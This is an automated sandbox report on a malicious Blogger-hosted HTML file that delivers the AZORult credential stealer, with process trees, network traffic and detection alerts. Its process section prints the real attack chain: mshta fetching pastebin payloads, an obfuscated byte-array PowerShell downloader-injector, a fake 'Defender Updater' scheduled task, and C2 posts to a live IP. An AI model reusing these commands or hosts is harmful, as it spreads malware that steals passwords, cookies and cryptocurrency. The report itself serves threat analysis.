
john.html

Full analysis: https://app.any.run/tasks/39ec71a2-31b9-4374-bb3f-1f64cdf3d013
Verdict: Malicious activity
Threats:
AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: July 11, 2019, 13:43:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, rat, azorult
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines
MD5: DCB1AA86FABDBA8712A4D1ADCFDB0571
SHA1: D672EF3C4CB85EA5E73EA53889D1C74BFEE68B5E
SHA256: BF1794B8A7621AC5798D61658A8A3DB7B91362B68B9A88765A0523C19590D0F8
SSDEEP: 768:uG3eyHHvPWdoaTwOkxWXnFooCil/g2SpT:uG3LHH2dTTwOKWX9Cil/e

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Uses Task Scheduler to run other applications
      • mshta.exe (PID: 2388)
    • Changes the autorun value in the registry
      • mshta.exe (PID: 2388)
    • Executes PowerShell scripts
      • mshta.exe (PID: 2388)
    • Loads the Task Scheduler COM API
      • schtasks.exe (PID: 1908)
    • AZORULT was detected
      • calc.exe (PID: 2112)
    • Connects to CnC server
      • calc.exe (PID: 2112)
    • Loads dropped or rewritten executable
      • calc.exe (PID: 2112)
    • Actions look like stealing of personal data
      • calc.exe (PID: 2112)
  • SUSPICIOUS
    • Creates files in the user directory
      • mshta.exe (PID: 3112)
      • mshta.exe (PID: 2388)
      • powershell.exe (PID: 2904)
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • mshta.exe (PID: 3112)
    • Application launched itself
      • mshta.exe (PID: 3112)
    • Starts CMD.EXE for command execution
      • mshta.exe (PID: 2388)
      • calc.exe (PID: 2112)
    • Uses TASKKILL.EXE to kill Office Apps
      • cmd.exe (PID: 2708)
    • Uses TASKKILL.EXE to kill process
      • cmd.exe (PID: 2708)
    • Connects to server without host name
      • calc.exe (PID: 2112)
    • Reads the cookies of Mozilla Firefox
      • calc.exe (PID: 2112)
    • Reads the cookies of Google Chrome
      • calc.exe (PID: 2112)
    • Starts CMD.EXE for self-deleting
      • calc.exe (PID: 2112)
    • Executable content was dropped or overwritten
      • calc.exe (PID: 2112)
  • INFO
    • Reads Internet Explorer settings
      • mshta.exe (PID: 3112)
      • mshta.exe (PID: 2388)
No Malware configuration.

TRiD
.html | HyperText Markup Language (100)

EXIF (HTML)
Title: createdbymewithdeniss: john
Rating: adult
Generator: blogger
ContentType: text/html; charset=UTF-8
viewport: width=1100
Total processes: 50
Monitored processes: 12
Malicious processes: 4
Suspicious processes: 1

Behavior graph

Processes in the graph, in order: mshta.exe, mshta.exe, cmd.exe, powershell.exe, schtasks.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, calc.exe (#AZORULT), cmd.exe, timeout.exe

Process information

PID: 3112
CMD: "C:\Windows\System32\mshta.exe" https://createdbymewithdeniss.blogspot.com/p/john.html
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 2388
CMD: "C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/3VczmYsx
Path: C:\Windows\System32\mshta.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 2708
CMD: "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows Command Processor
Exit code: 128
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2904 (CMD and Path on the following line)
2904"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,76,67,74,53,89,121,104,122,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,85,99,110,65,85,78,118,74,39,41,46,114,101,112,108,97,99,101,40,39,33,33,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEXC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID: 1908
CMD: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Defender Updater" /tr "mshta.exe http://pastebin.com/raw/rd9puWAp" /F
Path: C:\Windows\System32\schtasks.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3828
CMD: taskkill /f /im winword.exe
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 4040
CMD: taskkill /f /im excel.exe
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3860
CMD: taskkill /f /im MSPUB.exe
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3472
CMD: taskkill /f /im POWERPNT.EXE
Path: C:\Windows\system32\taskkill.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2112
CMD: "{path}"
Path: C:\WINDOWS\system32\calc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows Calculator
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 703
Read events: 515
Write events: 188
Delete events: 0

Modification events

PID Process | Operation | Key | Name | Value
3112 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3112 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3112 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
3112 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | (binary value, next line)
4600000077000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3112 mshta.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | LanguageList | en-US
2388 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2388 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2388 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
2388 mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | (same binary value as the PID 3112 entry above)
2388 mshta.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | LanguageList | en-US
Executable files: 48
Suspicious files: 3
Text files: 15
Unknown types: 0

Dropped files

PID Process | Filename | Type
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_1 | (not recorded)
  MD5: (not recorded) | SHA256: (not recorded)
2904 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0BLXGUI4WKY4332L6I5.temp | (not recorded)
  MD5: (not recorded) | SHA256: (not recorded)
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\3399642339-ieretrofit[1].js | html
  MD5: BE2B0433B22D6FC049F1B2D75DAAF7FA | SHA256: 7186786ED5A17B3DB11B7BE7B4EFF0E2A95FDE616D81E68FEE6530F7523FB6E9
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\john[1].html | html
  MD5: 1C9C53447EDB5748DE788FA8ED52A214 | SHA256: FEAE3B2F36AC755D9F22A393F3B98D47B33E0F80AAC20301D99B0D4F91B967B5
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js | html
  MD5: 9EE08AD2448D931C3350F8EFB31B9583 | SHA256: 045A89DA56E925603D6AE87BD25C68A06487B706CB75CD41138614995118D32E
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_2 | text
  MD5: DFCA983F4B2AFD0472667416B99E0F9A | SHA256: B88D9432A00CFA0D6CFDC1F55AD27E75B029B638075C68E1DE32EB5A5DC0B943
2388 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\3VczmYsx[1].txt | html
  MD5: ED4BD6B5E56526C4C2221380DB37C224 | SHA256: E4E12E42E568F8A461D040C8B4E1B9E3BD06B9ACF7E3AFC6A49892F18B3FECBF
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1] | text
  MD5: 35FE91C2AC1BA0913CC617622B9EB43F | SHA256: 966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
3112 mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt | text
  MD5: F82F6EC87A3028212B9AD7951BB23C1D | SHA256: CF2FF2B5C435D2EE08C7A08D3A033997B932DF284452A2EB68D767D32743D712
3112 mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\1501421786-widgets[1].js | text
  MD5: 65CAB1DA9A68D9FC06C0CEEA26E1879F | SHA256: 75033E75836DE28AF64FA0ABCDEEC178DF9DB9446A09BEA2A8E9E72958466B4B
HTTP(S) requests: 3
TCP/UDP connections: 14
DNS requests: 9
Threats: 0

HTTP requests

PID Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation
2388 mshta.exe | GET | 301 | 104.20.208.21:80 | http://www.pastebin.com/raw/3VczmYsx | US | html | 2.02 Kb | shared
2112 calc.exe | POST | 200 | 149.56.223.205:80 | http://149.56.223.205/john/index.php | CA | txt | 4.27 Mb | malicious
2112 calc.exe | POST | 200 | 149.56.223.205:80 | http://149.56.223.205/john/index.php | CA | text | 5 b | malicious

Connections

PID Process | IP | Domain | ASN | CN | Reputation
3112 mshta.exe | 216.58.205.226:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted
3112 mshta.exe | 172.217.22.9:443 | www.blogger.com | Google Inc. | US | whitelisted
(no PID recorded) | 172.217.18.173:443 | accounts.google.com | Google Inc. | US | whitelisted
3112 mshta.exe | 172.217.16.137:443 | resources.blogblog.com | Google Inc. | US | unknown
3112 mshta.exe | 172.217.16.174:443 | apis.google.com | Google Inc. | US | whitelisted
3112 mshta.exe | 172.217.22.33:443 | createdbymewithdeniss.blogspot.com | Google Inc. | US | whitelisted
2388 mshta.exe | 104.20.208.21:80 | www.pastebin.com | Cloudflare Inc | US | shared
2388 mshta.exe | 104.20.209.21:80 | www.pastebin.com | Cloudflare Inc | US | shared
2388 mshta.exe | 104.20.209.21:443 | www.pastebin.com | Cloudflare Inc | US | shared
2112 calc.exe | 149.56.223.205:80 | (no domain) | OVH SAS | CA | malicious

DNS requests

Domain | IP | Reputation
createdbymewithdeniss.blogspot.com | 172.217.22.33 | whitelisted
www.blogger.com | 172.217.22.9 | shared
apis.google.com | 172.217.16.174 | whitelisted
pagead2.googlesyndication.com | 216.58.205.226 | whitelisted
resources.blogblog.com | 172.217.16.137 | whitelisted
accounts.google.com | 172.217.18.173 | shared
www.pastebin.com | 104.20.209.21, 104.20.208.21 | shared
pastebin.com | 104.20.209.21, 104.20.208.21 | shared

Threats

PID Process | Class | Message
2388 mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2112 calc.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2
2112 calc.exe | A Network Trojan was detected | AV TROJAN Azorult CnC Beacon
2112 calc.exe | A Network Trojan was detected | AV TROJAN AZORult CnC Beacon
2112 calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request
2112 calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header
2112 calc.exe | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
2112 calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header
2112 calc.exe | A Network Trojan was detected | AV TROJAN Azorult CnC Beacon
2112 calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request
1 ETPRO signature available at the full report
No debug info